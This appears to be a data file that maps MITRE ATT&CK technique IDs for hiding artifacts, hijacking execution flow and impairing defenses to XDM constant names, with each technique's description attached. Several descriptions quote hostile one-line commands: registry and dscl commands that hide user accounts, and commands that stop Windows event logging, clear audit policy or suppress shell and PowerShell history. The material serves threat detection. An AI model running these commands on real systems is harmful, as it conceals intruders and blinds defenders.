https://attack.mitre.org/techniques/T1564/005
T1564.001 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_HIDDEN_FILES_AND_DIRECTORIES Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls -a for Linux and macOS). On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys. Adversaries can use this to their advantage to hide files and folders anywhere on the system and evade a typical user or system analysis that does not incorporate investigation of hidden files. https://attack.mitre.org/techniques/T1564/001
T1564.002 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_HIDDEN_USERS Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many user accounts on a given system or want to keep an account hidden from the other users on the system. In macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts.(Citation: Cybereason OSX Pirrit) In Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A) https://attack.mitre.org/techniques/T1564/002
T1564.003 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_HIDDEN_WINDOW Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. On Windows, scripting languages such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) offer a variety of features to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019) Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware) https://attack.mitre.org/techniques/T1564/003
T1564.004 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_NTFS_FILE_ATTRIBUTES Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014) Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015) https://attack.mitre.org/techniques/T1564/004
Original Mapped Description
T1564.009 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_RESOURCE_FORKING Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes) Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020) https://attack.mitre.org/techniques/T1564/009
T1564.006 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_RUN_VIRTUAL_INSTANCE Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019) Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020) https://attack.mitre.org/techniques/T1564/006
T1564.007 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_VBA_STOMPING Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020) MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream) An adversary may hide malicious VBA code by overwriting the VBA source code location with zeros, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev) https://attack.mitre.org/techniques/T1564/007
T1574 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. https://attack.mitre.org/techniques/T1574
T1574.012 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_COR_PROFILER Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) https://attack.mitre.org/techniques/T1574/012
T1574.001 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_DLL_SEARCH_ORDER_HIJACKING Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. https://attack.mitre.org/techniques/T1574/001
T1574.002 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_DLL_SIDE_LOADING Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) https://attack.mitre.org/techniques/T1574/002
T1574.004 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_DYLIB_HIJACKING Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO) https://attack.mitre.org/techniques/T1574/004
T1574.006 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_DYNAMIC_LINKER_HIJACKING Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD) On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such as Python’s os.environ. On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) https://attack.mitre.org/techniques/T1574/006
T1574.005 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_EXECUTABLE_INSTALLER_FILE_PERMISSIONS_WEAKNESS Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)(Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. https://attack.mitre.org/techniques/T1574/005
T1574.007 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_PATH_INTERCEPTION_BY_PATH_ENVIRONMENT_VARIABLE Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. For example, if C:\example path precedes C:\Windows\system32 in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. https://attack.mitre.org/techniques/T1574/007
T1574.008 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_PATH_INTERCEPTION_BY_SEARCH_ORDER_HIJACKING Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property) Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). https://attack.mitre.org/techniques/T1574/008
T1574.009 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_PATH_INTERCEPTION_BY_UNQUOTED_PATH Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide) This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. https://attack.mitre.org/techniques/T1574/009
T1574.010 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_SERVICES_FILE_PERMISSIONS_WEAKNESS Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. https://attack.mitre.org/techniques/T1574/010
T1574.011 XDM_CONST.MITRE_TECHNIQUE_HIJACK_EXECUTION_FLOW_SERVICES_REGISTRY_PERMISSIONS_WEAKNESS Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service) If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms) Adversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, if adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll. (Citation: malware_hides_service) https://attack.mitre.org/techniques/T1574/011
T1562 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. https://attack.mitre.org/techniques/T1562
T1562.008 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DISABLE_CLOUD_LOGS An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity. (Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) https://attack.mitre.org/techniques/T1562/008
T1562.002 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DISABLE_WINDOWS_EVENT_LOGGING Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications. (Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings. (Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:"Account Logon" /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind. https://attack.mitre.org/techniques/T1562/002
T1562.007 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DISABLE_OR_MODIFY_CLOUD_FIREWALL Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS) Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. https://attack.mitre.org/techniques/T1562/007
T1562.004 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DISABLE_OR_MODIFY_SYSTEM_FIREWALL
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.
https://attack.mitre.org/techniques/T1562/004
T1562.001 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DISABLE_OR_MODIFY_TOOLS
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying/deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)
https://attack.mitre.org/techniques/T1562/001
Original Mapped Description
T1562.010 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_DOWNGRADE_ATTACK
Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ include Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)
https://attack.mitre.org/techniques/T1562/010
T1562.003 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_IMPAIR_COMMAND_HISTORY_LOGGING
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that " ls" will not be saved, but "ls" would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
https://attack.mitre.org/techniques/T1562/003
T1562.006 XDM_CONST.MITRE_TECHNIQUE_IMPAIR_DEFENSES_INDICATOR_BLOCKING
